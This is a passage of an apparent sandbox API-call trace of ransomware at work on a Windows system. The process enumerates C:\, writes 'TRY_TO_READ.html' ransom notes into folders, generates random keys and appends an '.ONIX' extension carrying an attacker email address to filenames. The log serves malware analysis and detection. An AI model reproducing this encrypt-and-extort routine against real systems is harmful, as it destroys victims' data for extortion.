lpMem=0x466568 | out: hHeap=0x410000) returned 1 [0064.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472078 | out: hHeap=0x410000) returned 1 [0064.965] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0064.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.965] GetLastError () returned 0x0 [0064.965] SetLastError (dwErrCode=0x0) [0064.965] GetLastError () returned 0x0 [0064.965] SetLastError (dwErrCode=0x0) [0064.965] GetLastError () returned 0x0 [0064.965] SetLastError (dwErrCode=0x0) [0064.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470ad8 | out: hHeap=0x410000) returned 1 [0064.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0064.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472078 [0064.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466568 [0064.966] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466578 [0064.966] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0064.966] GetLastError () returned 0x0 [0064.966] SetLastError (dwErrCode=0x0) [0064.966] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0064.966] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0064.966] GetLastError () returned 0x0 [0064.966] SetLastError (dwErrCode=0x0) [0064.966] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x472550 [0064.966] CreateFileW (lpFileName="C:\\\\Documents and Settings\\TRY_TO_READ.html" (normalized: "c:\\documents and settings\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.966] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472550 | out: hHeap=0x410000) returned 1 [0064.966] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.967] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.967] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.967] CloseHandle (hObject=0x3d4) returned 1 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466578 | out: hHeap=0x410000) returned 1 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466568 | out: hHeap=0x410000) returned 1 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.968] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.968] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.968] GetLastError () returned 0x0 [0064.968] SetLastError (dwErrCode=0x0) [0064.968] GetLastError () returned 0x0 [0064.968] SetLastError (dwErrCode=0x0) [0064.968] GetLastError () returned 0x0 [0064.968] SetLastError (dwErrCode=0x0) [0064.968] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0064.968] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.968] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470ad8 | out: hHeap=0x410000) returned 1 [0064.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0064.968] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.968] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x466da0 [0064.968] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466568 [0064.968] CreateFileW (lpFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.968] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.969] CreateFileW (lpFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.969] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.969] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x466da0 | out: pbBuffer=0x466da0) returned 1 [0064.969] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466568 | out: pbBuffer=0x466568) returned 1 [0064.969] SetFileAttributesW (lpFileName="C:\\\\hiberfil.sys", dwFileAttributes=0x80) returned 0 [0064.969] lstrlenW (lpString="C:\\\\hiberfil.sys") returned 16 [0064.969] GetProcessHeap () returned 0x410000 [0064.969] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x461440 [0064.969] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\hiberfil.sys" | out: lpString1="C:\\\\hiberfil.sys") returned="C:\\\\hiberfil.sys" [0064.969] lstrcatW (in: lpString1="C:\\\\hiberfil.sys", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\hiberfil.sys.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\hiberfil.sys.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0064.969] GetProcessHeap () returned 0x410000 [0064.969] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0064.969] CloseHandle (hObject=0xffffffff) returned 0 [0064.969] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470ad8 | out: hHeap=0x410000) returned 1 [0064.969] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0064.969] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.969] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.969] GetLastError () returned 0x6 [0064.969] SetLastError (dwErrCode=0x6) [0064.969] GetLastError () returned 0x6 [0064.969] SetLastError (dwErrCode=0x6) [0064.969] GetLastError () returned 0x6 [0064.969] SetLastError (dwErrCode=0x6) [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720c8 [0064.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0064.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720c8 | out: hHeap=0x410000) returned 1 [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720c8 [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c978 [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466578 [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466588 [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.970] GetLastError () returned 0x6 [0064.970] SetLastError (dwErrCode=0x6) [0064.970] GetLastError () returned 0x6 [0064.970] SetLastError (dwErrCode=0x6) [0064.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0064.970] CreateFileW (lpFileName="C:\\\\MSOCache\\TRY_TO_READ.html" (normalized: "c:\\msocache\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0064.970] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.971] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.971] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.971] CloseHandle (hObject=0x3d4) returned 1 [0064.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466588 | out: hHeap=0x410000) returned 1 [0064.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466578 | out: hHeap=0x410000) returned 1 [0064.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c978 | out: hHeap=0x410000) returned 1 [0064.972] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0064.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.972] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.972] GetLastError () returned 0x0 [0064.972] SetLastError (dwErrCode=0x0) [0064.972] GetLastError () returned 0x0 [0064.972] SetLastError (dwErrCode=0x0) [0064.972] GetLastError () returned 0x0 [0064.972] SetLastError (dwErrCode=0x0) [0064.972] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c978 [0064.972] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.972] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470ad8 | out: hHeap=0x410000) returned 1 [0064.972] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c978 | out: hHeap=0x410000) returned 1 [0064.972] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.972] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x43e2f0 [0064.972] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466578 [0064.972] CreateFileW (lpFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.972] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.972] CreateFileW (lpFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.972] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.973] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x43e2f0 | out: pbBuffer=0x43e2f0) returned 1 [0064.973] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466578 | out: pbBuffer=0x466578) returned 1 [0064.973] SetFileAttributesW (lpFileName="C:\\\\pagefile.sys", dwFileAttributes=0x80) returned 0 [0064.973] lstrlenW (lpString="C:\\\\pagefile.sys") returned 16 [0064.973] GetProcessHeap () returned 0x410000 [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43e3f8 [0064.973] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\pagefile.sys" | out: lpString1="C:\\\\pagefile.sys") returned="C:\\\\pagefile.sys" [0064.973] lstrcatW (in: lpString1="C:\\\\pagefile.sys", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\pagefile.sys.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\pagefile.sys.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0064.973] GetProcessHeap () returned 0x410000 [0064.973] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0064.973] CloseHandle (hObject=0xffffffff) returned 0 [0064.973] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470ad8 | out: hHeap=0x410000) returned 1 [0064.973] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0064.973] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.973] GetLastError () returned 0x6 [0064.973] SetLastError (dwErrCode=0x6) [0064.973] GetLastError () returned 0x6 [0064.973] SetLastError (dwErrCode=0x6) [0064.973] GetLastError () returned 0x6 [0064.973] SetLastError (dwErrCode=0x6) [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c978 [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9a0 [0064.973] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c978 | out: hHeap=0x410000) returned 1 [0064.973] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c9a0 | out: hHeap=0x410000) returned 1 [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c978 [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9a0 [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9c8 [0064.973] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466588 [0064.974] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466598 [0064.974] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.974] GetLastError () returned 0x6 [0064.974] SetLastError (dwErrCode=0x6) [0064.974] GetLastError () returned 0x6 [0064.974] SetLastError (dwErrCode=0x6) [0064.974] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0064.974] CreateFileW (lpFileName="C:\\\\PerfLogs\\TRY_TO_READ.html" (normalized: "c:\\perflogs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.974] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0064.974] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.975] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.975] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.975] CloseHandle (hObject=0x3d4) returned 1 [0064.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466598 | out: hHeap=0x410000) returned 1 [0064.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466588 | out: hHeap=0x410000) returned 1 [0064.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c9c8 | out: hHeap=0x410000) returned 1 [0064.975] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdd8103e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd8103e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0064.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.975] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.975] GetLastError () returned 0x0 [0064.976] SetLastError (dwErrCode=0x0) [0064.976] GetLastError () returned 0x0 [0064.976] SetLastError (dwErrCode=0x0) [0064.976] GetLastError () returned 0x0 [0064.976] SetLastError (dwErrCode=0x0) [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9c8 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9f0 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c9c8 | out: hHeap=0x410000) returned 1 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c9f0 | out: hHeap=0x410000) returned 1 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9f0 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9c8 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447b68 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447b68 | out: hHeap=0x410000) returned 1 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c9c8 | out: hHeap=0x410000) returned 1 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c9f0 | out: hHeap=0x410000) returned 1 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470ad8 | out: hHeap=0x410000) returned 1 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470ad8 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9f0 [0064.976] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.976] GetLastError () returned 0x0 [0064.976] SetLastError (dwErrCode=0x0) [0064.976] GetLastError () returned 0x0 [0064.976] SetLastError (dwErrCode=0x0) [0064.976] GetLastError () returned 0x0 [0064.976] SetLastError (dwErrCode=0x0) [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b10 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b10 | out: hHeap=0x410000) returned 1 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b10 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b10 | out: hHeap=0x410000) returned 1 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b10 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c9c8 [0064.977] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.977] GetLastError () returned 0x0 [0064.977] SetLastError (dwErrCode=0x0) [0064.977] GetLastError () returned 0x0 [0064.977] SetLastError (dwErrCode=0x0) [0064.977] GetLastError () returned 0x0 [0064.977] SetLastError (dwErrCode=0x0) [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca40 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca40 | out: hHeap=0x410000) returned 1 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.977] RtlAllocateHeap 